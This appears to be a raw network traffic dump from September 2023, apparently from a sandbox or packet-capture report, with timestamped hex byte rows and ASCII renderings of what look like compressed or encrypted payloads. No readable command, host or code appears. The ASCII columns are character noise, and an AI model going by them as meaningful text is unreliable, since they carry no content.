                                                                                                                      2023-09-07 16:19:23 UTC94INData Raw: e5 d4 a7 74 4e b5 9f ac 47 78 ec 74 9b d0 cb 7e 46 b7 eb b8 3d 37 a0 c7 21 87 69 90 3b 7f f9 ae 28 31 93 f2 8a 57 17 7e 5a f4 f2 cb 50 88 e6 6e 15 53 03 cd 62 72 ef d1 5d e8 1c 27 72 97 0f 7b b6 96 5e 84 3d 46 ea 73 49 51 2d dd 86 1e fc bb b4 74 bb fe db 8d 3d a8 8b 0c 4f a4 cf a3 9e d5 ed f2 74 b9 ba dc bd 52 d2 c1 db 20 e7 88 33 70 46 72 a8 2d a9 23 4a 4c a6 a6 0e e7 b0 2e 85 cc be f7 be ab 4c c7 52 74 2d 53 3c 97 7e 75 0a 8c 56 b9 e0 ab 75 7b d1 c9 d7 84 a0 ed ab 6a 78 53 f2 c8 52 a9 96 2b b7 66 c4 6c 10 3b 8a e5 fe ec ad 6f 93 f5 80 66 39 9b 22 a2 fd c9 d3 aa 56 ae 4e 40 53 c2 be 83 08 ab 50 67 c2 24 33 4a 86 69 5e 4c ad d0 de ae 60 6b a6 c0 0c 70 a5 a9 12 ed c6 f6 37 ec 9b e4 dc 7a 92 62 ae 22 83 47 c9 18 53 b2 7a b5 b7 07 c2 3f 45 53 a0 fa d4 a0 4d
                                                                                                                      Data Ascii: tNGxt~F=7!i;(1W~ZPnSbr]'r{^=FsIQ-t=OtR 3pFr-#JL.LRt-S<~uVu{jxSR+fl;of9"VN@SPg$3Ji^L`kp7zb"GSz?ESM
                                                                                                                      2023-09-07 16:19:23 UTC101INData Raw: 82 2c 85 52 6e 0c 1f fd 48 93 a6 2d bd fb be e7 e4 96 a4 3d 37 f3 ec 1f 84 9c fc ce 7d cf ef 9c dc df b9 ef 39 cd 79 5f 2e cd 8c f7 7e 30 71 0d a0 6b 53 a1 95 00 8d 03 34 3e 15 ba 81 6b a9 51 b9 96 7b 54 f0 0d b8 14 df 20 d9 2c 71 7c da e5 9a f3 82 e3 bc f4 03 da f6 f9 a9 56 4e a1 88 51 cc 53 a1 23 29 22 9e 04 bd 95 22 60 66 a7 03 72 cd 45 c1 71 91 cc 13 17 51 ce 8c c1 ab c7 63 29 2d bb 15 1d f5 7e 87 c2 7a ea 2d a2 b0 a6 5e f6 3d 30 82 0b e4 9a 88 e0 88 68 f7 40 84 61 ea c4 38 31 75 49 47 bd 87 28 ac a7 de 57 28 ac a9 97 4d 64 37 21 72 55 70 5c d5 88 5c 65 98 5a 4f 4d e9 a9 77 09 85 f5 d4 9b 4b 61 4d bd 6c 22 24 77 54 cd a0 e0 18 d4 88 0c 32 4c b5 5d 23 a6 a2 3a ea 3d 40 61 3d f5 06 28 ac a9 97 4d e4 fb 84 48 5c 70 c4 35 22 71 86 a9 4a 6a 6a 58 47 bd 0b
                                                                                                                      Data Ascii: ,RnH-=7}9y_.~0qkS4>kQ{T ,q|VNQS#)""`frEqQc)-~z-^=0h@a81uIG(W(Md7!rUp\\eZOMwKaMl"$wT2L]#:=@a=(MH\p5"qJjjXG
                                                                                                                      2023-09-07 16:19:23 UTC109INData Raw: f0 1f 2d 5e d9 9b 8e 58 cb 83 74 e5 a7 20 22 24 c7 61 ea ea 45 e2 37 16 40 19 4d bd 8b ff 9c e7 2e a1 5c 82 2c b5 b5 15 03 33 7f 38 7f 3e ab 35 f7 08 cd d1 5d 8a 05 1c ad c1 cb 45 5e 1a df c2 87 9a ef b9 f8 16 56 d4 ac ff 0f e2 9b 79 9b c7 f3 36 9b ab 09 e7 fb 46 25 bc dd a2 31 66 43 8c 04 70 ed 37 99 f8 fa 0a 07 97 91 ba 54 e0 f2 03 d7 3f d4 95 03 2e 2f 70 3d a1 ae 7c 70 81 8c 6a db f2 5c dc f7 14 18 6f 6c 43 eb 61 cd 81 d2 ef b1 1e e8 f4 59 c5 a1 1c 77 89 10 b8 15 02 a0 05 28 05 58 02 f0 01 c0 97 00 3b 01 36 54 03 09 7a bc 61 05 7d 3d cd da 38 0e b0 ed 9a b8 ec 9a b8 ec 9b b8 84 36 2e 5d d5 6c 9f a3 fe b3 21 3b 86 03 e6 f0 d6 4d b0 45 4d 5c 8e 36 ae 3e c8 64 f3 ab d4 fa 1a 68 7e 3d c0 8a 9b a0 13 81 25 a0 3d 17 40 3b 18 be 60 9b f0 d6 5f 18 09 7a 4e f7
                                                                                                                      Data Ascii: -^Xt "$aE7@M.\,38>5]E^Vy6F%1fCp7T?./p=|pj\olCaYw(X;6Tza}=86.]l!;MEM\6>dh~=%=@;`_zN
                                                                                                                      2023-09-07 16:19:23 UTC117INData Raw: ad 26 70 bc 62 8d 13 72 11 df 37 c9 d9 b5 37 38 d5 57 4e 57 f5 b6 b0 e7 cf d3 54 83 9b a4 da 9f a7 a0 b5 49 d5 0e 28 40 29 ba 34 11 6e 17 1c 57 61 68 f5 af 26 93 f5 73 a3 4d 02 4c 8b 69 c7 3a 55 99 a5 b0 02 10 40 d0 1f dd 30 7b 2c fc c5 12 c3 0e 63 88 8b 36 03 c5 62 93 b8 e8 53 3b 7a 5a 83 01 6a b9 35 ce c4 4c 10 62 e3 e3 d4 86 01 cf a2 c4 85 a1 2a 76 1e d6 9d ac e1 47 fc c8 0d cf 7e da 8a d5 7d b6 d7 e9 a5 8f f1 93 2e 6d 07 6c 2c d8 77 45 56 a3 e0 d4 04 d2 2d dc e2 e2 e5 56 b4 1c 28 c1 a5 e2 72 6d 01 ef 9e 0d d1 a2 b9 71 fe 38 6c 54 b2 2a 6c db 65 b8 c8 fa 2a cf 91 e4 4b cd 6b b9 92 d6 72 f5 05 5e d3 d2 71 7a 39 7b 05 78 5f f3 0b dd b7 ad ed 8e e4 fd 4e 6b db 99 73 74 19 d8 5a 93 ce 7d d6 e4 6c a8 e8 75 c4 0b 3b 45 63 6b 64 2d e4 81 1e 6e 51 5c 4e 3b 01
                                                                                                                      Data Ascii: &pbr778WNWTI(@)4nWah&sMLi:U@0{,c6bS;zZj5Lb*vG~}.ml,wEV-V(rmq8lT*le*Kkr^qz9{x_NkstZ}lu;Eckd-nQ\N;
                                                                                                                      2023-09-07 16:19:23 UTC125INData Raw: 38 f8 da 80 0e 9c 8c 6b 4d 6f 39 04 91 24 b8 48 81 13 98 a2 c9 72 53 c7 e5 dc d2 c4 cd 54 ba e4 92 e1 a2 9a 8d 93 e6 c3 b7 43 61 ec d9 f4 8e fc 12 00 26 b2 0e db b9 78 67 b9 5e 56 6d 9e dc 76 e2 66 68 ab d9 f0 ed b8 f6 6f cf 4e 70 b5 4c e8 5b 27 86 fd fe 61 3a a2 6c 4a 46 bb 6b db 73 53 ac ad 7c 8e a6 ea 45 78 35 ed d1 0a fe 8a dd b6 63 cd 33 bf 5a 77 7e 1e 56 bc a3 2d 60 d9 de 97 0b cc 31 1e c3 f5 1d f1 0e 07 39 fb 64 35 ce 34 42 ee 17 41 44 43 09 4e 7d ea 1e 09 16 f7 01 11 29 90 fa 9c 81 d6 24 5e 73 10 af aa 98 1c 9f e1 48 27 6a 47 d3 d2 02 36 ca ad c4 8f 46 c9 95 8e 9e 25 60 ba 1a 0a 37 9b 27 7d 53 71 1e 96 bf c9 77 3a 96 73 5d a1 79 8e d9 36 33 38 6d e7 87 53 6a e5 34 a5 72 9c 38 c5 fd 8f 82 a6 a9 89 8b c7 a0 f5 b4 cb a2 32 cd d3 ba e7 1b 9b 6a 68 37
                                                                                                                      Data Ascii: 8kMo9$HrSTCa&xg^VmvfhoNpL['a:lJFksS|Ex5c3Zw~V-`19d54BADCN})$^sH'jG6F%`7'}Sqw:s]y638mSj4r82jh7
                                                                                                                      2023-09-07 16:19:23 UTC133INData Raw: 65 56 f6 7c e5 8b 93 c4 7a b7 a5 d3 b4 8f 72 e2 e6 8c 03 fa d8 d8 d7 38 26 e5 da 69 93 fe cd 09 e7 36 b3 d5 4c 6e 76 a6 a5 6d 42 1e e6 e4 66 2b 52 92 15 1a 06 e7 11 9f 53 6a 50 83 34 07 9c 7d 81 7d ac 9c 0a 21 fc 6a 78 f5 88 73 56 53 5b 02 4c c7 3b 9f fe 23 63 c7 8d 1b 37 d8 06 cc 75 c1 eb 19 ae 6b a6 43 4c 3e 2d 9b fe db 12 40 48 93 30 9c 8f e7 b3 43 cb 83 ad 86 ce be 6a c1 14 c5 51 73 9a 92 b1 0c 97 39 0d 94 0a 03 47 29 76 09 94 a7 80 3f 7e 01 37 b2 0b e6 e7 80 83 55 30 e0 56 66 9a 6d 39 9c 1d c8 e1 67 1d 34 9c 5d 47 ab a3 c9 dc a8 65 62 2b 34 28 22 46 d6 d4 f0 b2 ea 40 27 62 5e 9f fc 2f 46 23 34 1c e7 80 79 23 8e 4b 1f e7 3e ad 13 c4 74 2d d2 fc e4 d7 5a 93 52 b8 75 30 7e b1 5f 9d 62 0e 9f c2 11 51 6b b2 18 3e 1a c9 ca 4e a1 cf 9c e4 f4 c1 a0 0a 71 cd
                                                                                                                      Data Ascii: eV|zr8&i6LnvmBf+RSjP4}}!jxsVS[L;#c7ukCL>-@H0CjQs9G)v?~7U0Vfm9g4]Geb+4("F@'b^/F#4y#K>t-ZRu0~_bQk>Nq
                                                                                                                      2023-09-07 16:19:23 UTC140INData Raw: 91 10 a7 b3 c0 f6 f0 b2 34 fb 48 6d 26 93 8e 8d 2a 36 3b 21 3d 45 89 47 16 92 76 ad cc af b1 d9 96 70 f2 be bd 5c 9b 69 39 be f5 13 9b 1a 21 64 97 dd 84 cc ec 39 8a 4c fa 51 3e 99 24 9b 12 25 8b 30 9f 75 37 cc 3e 4f 93 03 b2 c9 a4 06 91 e1 f6 79 f3 2d 0e d2 d6 ce fa 2d 72 10 e9 45 65 44 a9 99 cb 64 e7 f0 9f 2a 93 51 76 f2 6c 0d 33 59 9b ce f0 98 64 98 9d 5c a9 9c cb bb 80 c6 2d c1 a4 f4 4c 2a 65 b9 64 b7 5d 0c a7 5d 40 1a bf 25 21 e9 9a 1c 05 93 ac b2 e2 36 d8 c5 e2 4d 94 b8 e7 c6 4c 8e 4c c3 54 2d 28 23 68 7a d6 18 a3 a9 9b e3 a5 d5 17 6f 9f 30 97 2e 45 c0 7f 8f cd 6b 9c 55 76 53 94 f3 95 b9 0c 1e 6c 9a 99 0a 6d 57 10 9e 95 03 6c ca c6 3a 8d c8 4e 4b 53 a6 44 ab e9 e9 79 7a 01 38 b3 e9 3b c4 9b 8e 74 62 b3 e7 2a d5 36 9f 74 93 87 02 1b b9 a4 a1 78 9e 7f
                                                                                                                      Data Ascii: 4Hm&*6;!=EGvp\i9!d9LQ>$%0u7>Oy--rEeDd*Qvl3Yd\-L*ed]]@%!6MLLT-(#hzo0.EkUvSlmWl:NKSDyz8;tb*6tx
                                                                                                                      2023-09-07 16:19:23 UTC148INData Raw: 97 f0 c7 6c 33 fd cf df ff fc fd a7 7f 74 3e c4 89 fc b7 ff 9a 8f 09 9a cf 6d 9d 1b 0f 7a 67 3c 87 f3 ff e5 bf 97 dd 03 64 d7 ec cf 9e ff 6b 42 a3 d9 f3 bf ea ff bc f0 ff 2a 7e f3 e7 ff 0e 7f ab ae ba 4b fe 13 c0 03 63 11 b6 80 ae dd 54 fd 72 58 c2 ff 6d 03 fc cd d5 cf 07 d4 dd a8 b3 df 9a c0 7d d7 3d 98 e7 4f f3 7b f8 ed 6c be b1 fc 3f e9 8f fb 4a cf 9e 8e 47 3d b9 6f ed f0 bc b0 42 1c 73 4f e5 86 a7 36 78 f4 42 45 92 d3 82 3f f2 ac a4 05 7f e4 db fa 16 fc 71 10 5a 86 af 2d f8 57 b6 e0 8f b6 cd 45 3c bf 88 b4 a2 f7 b2 56 f3 9f a0 46 08 5a 91 b5 f6 56 77 b5 b0 15 99 2e b0 ba 5f f4 d7 83 04 d3 1b b4 17 d0 7b 55 f1 5e 65 86 de bb 97 4c ef 81 1e c6 df 3f 2d 25 51 44 09 21 31 cd 6e 44 8e a0 b7 92 13 22 0f 5a 6b 3f 9c 6e 50 8f 21 49 24 9e de 70 88 77 f6 e3 59
                                                                                                                      Data Ascii: l3t>mzg<dkB*~KcTrXm}=O{l?JG=oBsO6xBE?qZ-WE<VFZVw._{U^eL?-%QD!1nD"Zk?nP!I$pwY
                                                                                                                      2023-09-07 16:19:23 UTC156INData Raw: 68 03 66 14 93 ce 2c 65 6e 32 96 ac 03 eb cc b6 00 4e 1e ca c6 00 07 4f 00 df 36 9b 5d c9 66 b3 9b d9 1d c0 be c7 d8 33 ec 25 f6 2e 44 bb 15 a0 d3 0c ee 24 77 86 bb cc dd e0 ca b8 87 dc 6b ce 9f ef c7 87 f2 cf f9 8f e0 49 10 78 b7 40 61 80 10 23 cc 87 4a db 28 e4 0b bf 0b 22 28 d6 78 f0 1e d9 d2 46 29 57 0a d4 af 92 4c 97 57 c9 eb e5 3a 0a a7 b4 56 3a 42 cd f5 57 a2 81 85 c6 2a 93 94 e9 ca 42 65 b9 b2 1e f8 68 3f 70 d1 29 70 21 b7 95 ba 2a a9 76 51 75 cf 68 ea 9e 25 eb 86 7b e1 20 9c 82 67 e0 ed b8 13 41 2a 33 95 bb ca 6b a5 9a 6a a7 36 55 83 f5 5a c9 50 93 ac fb bd 20 5a 04 ee 24 07 e5 02 6e 45 83 7b 9e 0b 78 b4 07 18 ea 26 e0 f4 37 6c 45 34 22 68 a2 3d 91 4a 7c a5 06 d3 49 a0 f4 4e d1 d7 e9 db f4 4b fa 3d 4d 30 9d 98 c9 cc 30 d6 1e 54 db 1b fe 2b af 73
                                                                                                                      Data Ascii: hf,en2NO6]f3%.D$wkIx@a#J("(xF)WLW:V:BW*Beh?p)p!*vQuh%{ gA*3kj6UZP Z$nE{x&7lE4"h=J|INK=M00T+s
                                                                                                                      2023-09-07 16:19:23 UTC164INData Raw: 4c 55 39 f7 fb f3 84 51 91 33 06 bc 6f b8 db f7 51 e3 55 67 06 cd ab 1d 59 78 73 e7 d6 49 d7 23 0c 63 9d 0d 0e 8f 2b 99 f7 3a b6 ba 14 f0 a4 a7 eb e3 6a 59 f5 8f a6 6a d3 3a 37 50 2d 96 93 4b 2b ba 15 2f bf 3a 31 f5 dc 6f 8f bf 74 7a 3a 27 ff 7d ad d8 b8 16 4f 47 7e 88 9e e9 3e 5a 71 3a 60 92 51 3a dd c9 6a c0 fb be fb 27 25 1e 5f e1 e3 1f 72 7e f0 cd b9 e9 25 78 92 e1 9c c7 2b ef 3f 3d d7 a7 d7 c9 88 b2 1e 1d e7 05 e1 34 83 11 28 cd 20 4a af 26 36 fe 77 c5 9f bf 07 ce 5f 44 c6 22 e4 f0 b3 7e a8 f5 0b 15 fd af d6 59 b9 3e a8 f9 4f 27 1b 98 61 47 e4 80 a0 29 8c 6c 98 1e 63 bb ad 1e 1a f1 e1 79 db 05 af 6e 2c d9 ef 61 be 3e ea e3 bf a9 8d b7 3b 57 59 2f df 94 f4 72 fd e1 e0 05 a6 53 34 6d 07 3e eb bc f2 d8 8c a9 bd cd 42 ae 4a a3 1f d6 df f7 37 6a 23 65 d6
                                                                                                                      Data Ascii: LU9Q3oQUgYxsI#c+:jYj:7P-K+/:1otz:'}OG~>Zq:`Q:j'%_r~%x+?=4( J&6w_D"~Y>O'aG)lcyn,a>;WY/rS4m>BJ7j#e
                                                                                                                      2023-09-07 16:19:23 UTC172INData Raw: dc b6 34 da 57 c6 42 0d cb 59 e8 70 d3 22 34 03 7e 5b ae 10 6d 40 f8 6e b8 5b 2b 5b e8 73 ec 55 2d d6 33 2a 91 82 b5 90 6c a1 53 df 59 c8 dd d0 42 8f 80 ef 41 d1 46 16 5a 8f be ad 87 7c 5b d6 b3 18 0c 00 b5 e1 37 7e 20 47 2f 0d e2 a8 39 dc 92 f5 2d 74 b6 0d 74 50 ba 85 d6 a0 4f 12 97 4a 94 7a c3 42 d7 51 6e 89 29 8c 5e 5b 66 a1 6b 93 19 95 86 db 04 0c 04 43 81 d0 ac 08 59 c0 f6 26 45 28 fd 5d 8e d6 3c 1c 4b 4b b0 de a6 67 70 d4 c1 ca d1 9c 0c 46 eb f0 bc ae 2b 47 de a7 18 cd 99 c1 e8 07 c8 33 d6 8b b4 19 d0 7c f4 f9 72 0b ad 5c 61 a1 b5 eb 45 85 1d 3f a1 4d c8 b3 fa 0b 8c 7a 7e 2b d1 b7 e0 13 f0 da 77 12 0d 04 2d 9a 17 a1 e4 55 16 fa b3 74 2c 65 d7 8b a5 7e a9 c0 11 4b 63 42 b1 54 ee ed 58 ba f2 61 2c 75 1a 1b 4b 23 a7 c6 52 ca 8c 58 7a 74 7e 2c 15 5d 18
                                                                                                                      Data Ascii: 4WBYp"4~[m@n[+[sU-3*lSYBAFZ|[7~ G/9-ttPOJzBQn)^[fkCY&E(]<KKgpF+G3|r\aE?Mz~+w-Ut,e~KcBTXa,uK#RXzt~,]
                                                                                                                      2023-09-07 16:19:23 UTC179INData Raw: 05 b7 92 5b c5 ad e6 d6 70 6b b9 75 dc 7a 6e 03 b7 91 db c4 6d e6 7e e0 b6 70 5b b9 6d dc 8f dc 76 ee 27 6e 07 b7 93 db c5 fd cc ed e6 f6 70 7b b9 3c 6e 1f b7 9f 3b c0 1d e4 0e 71 bf 70 87 b9 23 dc af dc 6f dc 51 ee 18 f7 3b f7 07 77 9c 3b c1 9d e4 4e 71 a7 b9 33 dc 59 ee 4f ee 1c 77 9e bb c0 5d e4 2e 71 7f 71 97 b9 bf b9 2b dc 55 ee 1a f7 0f 77 9d bb c1 fd cb dd 84 e2 67 3c c7 f3 bc c0 8b bc c4 c7 f0 16 3e 96 8f e3 8b f0 45 f9 fb f8 fb f9 78 be 18 ff 00 5f 9c 7f 90 2f c1 3f c4 3f cc 3f c2 3f ca 97 e4 1f e3 4b f1 a5 f9 32 7c 59 fe 71 be 1c 5f 9e af c0 3f c1 57 e4 9f e4 9f e2 9f e6 9f e1 2b f1 95 f9 2a 7c 55 be 1a ff 2c ff 1c 5f 9d af c1 27 f0 35 f9 5a 7c 6d be 0e 5f 97 7f 9e af c7 bf c0 bf c8 d7 e7 1b f0 0d f9 46 7c 22 9f c4 27 f3 8d f9 14 be 09 df 94 6f
                                                                                                                      Data Ascii: [pkuznm~p[mv'np{<n;qp#oQ;w;Nq3YOw].qq+Uwg<>Ex_/????K2|Yq_?W+*|U,_'5Z|m_F|"'o
                                                                                                                      2023-09-07 16:19:23 UTC187INData Raw: 37 7a df cb 35 6f 7c b9 e6 9d 2f 37 7a eb cb 35 ed 67 b9 51 1b 5a 6e d4 8e 96 9b 6f 4b cb 0d 98 63 9a eb 1b 5d db e8 34 a6 a2 4c 0a 24 37 5a 83 44 7d 73 92 1b 88 ea 8c 7c 7d 11 5d 25 73 32 73 aa e8 44 51 69 c2 fa 27 27 e1 c8 37 27 61 5b c0 2e 2f 88 88 a4 f9 aa df 77 84 b5 af 1b c2 da 47 0c fa e7 48 61 ed 33 00 1c 55 74 bd 0f 51 d9 b7 22 df cb 98 3f 97 81 6c ec 5b 90 e5 4d c4 10 0c 3f af db 24 69 be ca be a5 ba 11 1f 2d 47 63 df 52 be c5 d1 53 7b 4c a9 3d 46 41 1e 53 49 9e 48 51 1e 73 59 f2 76 65 08 5a 19 ca be 05 57 0f 8a 84 68 7b 94 22 29 7a 5a 97 0c 5f b7 21 e1 fc 15 25 47 9e 42 91 a4 21 73 da 90 9e 58 d9 bd 54 37 e2 a3 55 c1 d8 bd 20 eb bb 57 d8 f8 a0 22 6c fa a2 22 6c 7c 52 11 36 7d 53 11 56 ee af ac 6e 43 d2 32 53 4f 32 e1 c8 47 0b 91 4f cf c2 da c7
                                                                                                                      Data Ascii: 7z5o|/7z5gQZnoKc]4L$7ZD}s|}]%s2sDQi''7'a[./wGHa3UtQ"?l[M?$i-GcRS{L=FASIHQsYveZWh{")zZ_!%GB!sXT7U W"l"l|R6}SVnC2SO2GO
                                                                                                                      2023-09-07 16:19:23 UTC195INData Raw: 8f d3 22 6f c3 63 6d 15 53 fc 38 ae ad 29 33 62 69 6e d8 28 5c 8b d8 c1 11 f4 8e fe 45 bc 3e 19 0e fa dc 04 48 64 f2 a6 16 62 87 90 25 2f 11 dc c5 79 57 44 e0 c2 67 12 05 82 85 5e 7a d0 96 97 23 fa 90 46 aa 49 e2 37 e2 d4 85 ae b8 c4 5e 4c a1 d7 2d 8a a7 a8 8a fe 59 fe 4f 3d 1c e2 87 c4 ba 0c 05 b7 90 0d 97 e0 77 32 37 68 f7 20 58 94 3e 36 20 49 37 10 3c e8 ab 82 9f f5 40 60 79 63 28 f9 df 30 70 eb 14 f7 f3 21 6e 0f b8 f5 8a 7b 6d 88 7b 5d 88 7b 7d 88 fb 6f 21 ee bf 87 b8 ff 11 e2 de ae ed 76 57 87 b8 65 3e 42 ad 43 5f dc 3c ac ca 25 86 9f 21 4b 83 0d 68 68 f7 43 2f 43 67 49 66 40 87 87 60 61 b3 01 c0 45 57 a0 ea e2 91 1f 25 49 66 34 87 0a 8c a4 43 9c d7 79 7f 71 2c 74 83 43 23 f2 c8 f3 cb 17 5a cd 1d b4 bb 09 52 db d5 04 b6 2c 4c a0 53 12 d0 ee 06 bb 96
                                                                                                                      Data Ascii: "ocmS8)3bin(\E>Hdb%/yWDg^z#FI7^L-YO=w27h X>6 I7<@`yc(0p!n{m{]{}o!vWe>BC_<%!KhhC/CgIf@`aEW%If4Cyq,tC#ZR,LS
                                                                                                                      2023-09-07 16:19:24 UTC203INData Raw: 86 71 b5 4e bd 64 dd 56 a9 9d e8 6f 1b 57 bb ec fa f1 29 2b 06 43 f8 75 8b 63 24 cb f6 5b 6b 2b 22 27 2b a1 df 8f 4f a4 dd 0f ff 4a 51 e3 6f 73 86 fb f2 d0 91 4e af 7b df 47 51 f7 b3 a5 9b 61 e2 ae e7 e1 5c c4 00 dc 11 37 23 c5 b2 9d 5e fd 32 2e 62 28 6a 69 3f 53 a3 c9 8b 66 c3 7d b8 0e a7 95 e1 4d c8 48 bc bb 63 d9 67 93 9c db c9 79 68 25 9e f0 2d 1b 4c 47 60 4a a4 e4 be 48 af a9 80 9c c3 2c db 52 72 5f 73 86 85 59 e2 52 72 df a0 dd 43 ce 52 d4 04 5b 2c 9c 3a d7 bd 06 18 7e c2 36 3f aa 28 18 a0 cc 0f cb a0 1f 59 df c3 bc 65 2b ca 02 a6 43 39 a5 fd 3a 9a 3e 6c cd af 06 1c bd 15 42 52 72 63 9d 11 b8 8f 59 f6 a5 e4 6e a5 dd 77 92 0b b6 5b 6b 4a b7 86 b1 35 d3 d9 e6 48 de ea c6 a4 34 c0 9f f0 1a 3c 43 35 bb 50 f8 58 94 12 46 b3 1f 40 5d 84 dc 03 26 2f 6f d9
                                                                                                                      Data Ascii: qNdVoW)+Cuc$[k+"'+OJQosN{GQa\7#^2.b(ji?Sf}MHcgyh%-LG`JH,Rr_sYRrCR[,:~6?(Ye+C9:>lBRrcYnw[kJ5H4<C5PXF@]&/o
                                                                                                                      2023-09-07 16:19:24 UTC211INData Raw: 11 f0 28 15 ec eb 90 c1 d3 09 f8 2f d0 95 33 21 24 07 f0 5f 47 b0 80 19 9a 10 6c 01 41 d5 4a 9a 59 04 1e 1f 84 6f ec c0 c7 22 1e 46 3b 33 2a a6 88 09 c8 41 2b 49 6e e3 63 ea bb 9f b5 23 17 21 d8 e5 f1 54 de c7 0d 68 81 ce 9d fb 19 45 15 cf 25 ef 75 89 2d 6b ba cd 33 8d e6 f0 5a ba 70 50 fc ac 43 be c9 3f 12 00 f5 e4 a5 28 62 89 9c ac 11 54 31 1c 02 19 f0 7b 8e 52 41 7d d6 b2 8b 66 9a c3 b7 80 85 d6 ca 2c 4d 45 ff 0c 24 ea dd 77 00 c0 7f 2e 68 05 84 e8 b7 9a 24 62 de a6 95 2f 6d 4b 59 0e 84 e0 5f 1b a1 1a 36 a8 c8 4c ac 48 13 90 5a df d1 ee 3b 39 a2 df 5a f0 34 31 15 12 40 ea eb 66 00 f1 c9 24 c9 45 ac b9 4e bc 4f 0e ed c4 d0 01 24 94 de b9 24 d9 93 0e d4 c9 20 bb c7 d2 4a f0 7f 3b a1 62 d2 81 3a 89 55 61 0f b7 93 4e 4d 07 d2 64 b0 0a 9b aa c0 80 34 b9 56
                                                                                                                      Data Ascii: (/3!$_GlAJYo"F;3*A+Inc#!ThE%u-k3ZpPC?(bT1{RA}f,ME$w.h$b/mKY_6LHZ;9Z41@f$ENO$$ J;b:UaNMd4V
                                                                                                                      2023-09-07 16:19:24 UTC219INData Raw: fc c4 f2 8b 2e 48 bb ac d6 e4 9d 5d 5b fc f1 53 d0 58 3c d9 e5 77 77 ce 73 2d 32 27 bc a3 29 3f b3 a0 b6 78 28 52 e9 f4 25 d2 61 75 18 fd 4b 64 25 ff af 83 2d 3f af b5 af b3 ad 23 76 57 53 2b 6c 1a 7b 10 eb 9e 27 bb 42 9c b8 d0 a2 c8 2d 7e dc 0a 5b 4e ae 01 68 17 3e 53 c7 67 ea 61 29 d8 80 66 c8 16 0e d4 53 9d d0 ad bc cd 28 5e 06 94 22 ce 07 52 7f af 81 5a ef 85 fd 64 9d 6b ab eb 6b f8 d3 c0 5f e5 ae f7 82 f7 dd d9 79 6d e4 86 b3 1d b6 bf 4e d4 b2 3a 4f 78 65 6d 22 79 2f db 12 80 13 34 39 36 b7 f1 11 78 92 7e 0d ca 2e 6c 54 2d fa a3 51 0e 0d 4e c7 b0 3a f6 69 1d 45 7b 9e 0f d3 52 28 5d d5 ed ca c7 fa e3 45 67 c1 19 2b 44 6c 06 2c f7 f7 2a 0d c5 2e 8f 03 04 5f 81 2e 68 d4 66 9d 27 43 4f 73 f6 2a 42 81 18 c8 25 f3 fc 7c 38 e4 c6 61 07 e3 15 42 f1 6d 38 65
                                                                                                                      Data Ascii: .H][SX<wws-2')?x(R%auKd%-?#vWS+l{'B-~[Nh>Sga)fS(^"RZdkk_ymN:Oxem"y/496x~.lT-QN:iE{R(]Eg+Dl,*._.hf'COs*B%|8aBm8e
                                                                                                                      2023-09-07 16:19:24 UTC226INData Raw: 37 df 03 c8 a2 a0 f9 42 55 4a 41 2c ed 6e dc 80 4b 1b 4d 49 19 cc 97 19 3d aa 54 1e 00 10 b1 81 04 db 8a 39 b0 34 0c 90 8b e4 1c ea b1 34 4b ce b8 7a cb 99 89 44 6d 37 96 77 8a 36 c0 e2 52 ae 9e 5c bb 8b 35 5f 60 ae 33 d7 d2 6b 76 43 6a c9 da 42 57 bc 8a 39 5b 9a 2b e2 60 db 2e 9c ad 1e 01 89 c9 0a f7 d6 0d 1a 4a dd 78 aa 37 c8 cb 8d 5e 55 85 49 43 2c e6 d8 8b e7 5e 00 14 67 96 ef fb 22 35 fb 3c c6 45 f2 f6 39 70 a0 86 70 0d 1e 79 68 8e 89 40 73 2c 1a d5 a1 a5 dd e5 78 25 7b 21 f8 14 83 ec e3 3e 8c e8 ab c7 50 3b f9 73 7c a7 4c 9c f7 2e 0c e7 47 87 2c f2 3d da 21 50 0a 33 18 88 e5 d3 23 84 d6 9a ae f0 9a d3 11 61 86 6a a4 50 fc 5a e1 b3 f6 34 54 a8 4d b5 12 bd 45 e6 3a 8c 1b ab 12 d6 84 96 f1 28 31 f7 b6 a7 26 94 d1 ee 5b d0 ae d3 00 8c 4e f0 83 ce 87 c3
                                                                                                                      Data Ascii: 7BUJA,nKMI=T944KzDm7w6R\5_`3kvCjBW9[+`.Jx7^UIC,^g"5<E9ppyh@s,x%{!>P;s|L.G,=!P3#ajPZ4TME:(1&[N
                                                                                                                      2023-09-07 16:19:24 UTC234INData Raw: d5 72 fd 3e e0 17 bd 67 1d 36 0c 1d 60 1b 03 af 74 8e 0f f5 62 3d 35 3f f8 c4 0c fd a0 d0 fb 61 ea 89 1d 34 c4 8d 51 46 e1 b6 2f d4 f0 8a 0c 27 c0 ab 9c 30 49 37 fc 53 b7 a6 3d 58 7d ac b3 f6 3e ba a6 cf 29 6a 74 12 0d bd a1 ae c0 62 3e b3 88 a5 83 1d 76 fc 48 83 4a 9a 6b 5d 00 41 96 93 d0 58 56 e4 28 a8 93 20 5d af c0 0b 5d a0 17 ea 7f ad 1e 91 10 2f 4f a9 47 c3 f4 3e a4 a1 c3 99 28 aa 3f c5 c2 a8 3e 50 5a 11 a4 1f a8 ea 82 f9 5f d9 ba 9a a3 ab 3f 5b c0 40 97 be 4d f1 73 7f e2 19 c4 1b 04 e6 50 bc 57 35 3e 0a 19 0d 79 4a c3 88 5b b8 33 a2 3e bf 91 ee 55 4c 65 a6 32 21 40 a3 b1 8c 27 e3 c2 74 67 fa d7 70 f7 62 fa 32 23 19 67 ba 97 32 96 19 c5 0c 67 86 30 a3 19 27 8a 71 c4 48 a4 0d 1c 19 09 8c e3 51 85 b7 f1 fc 89 c9 05 5c 60 53 0d bc 51 8e 71 40 45 e6 0e
                                                                                                                      Data Ascii: r>g6`tb=5?a4QF/'0I7S=X}>)jtb>vHJk]AXV( ]]/OG>(?>PZ_?[@MsPW5>yJ[3>ULe2!@'tgpb2#g2g0'qHQ\`SQq@E
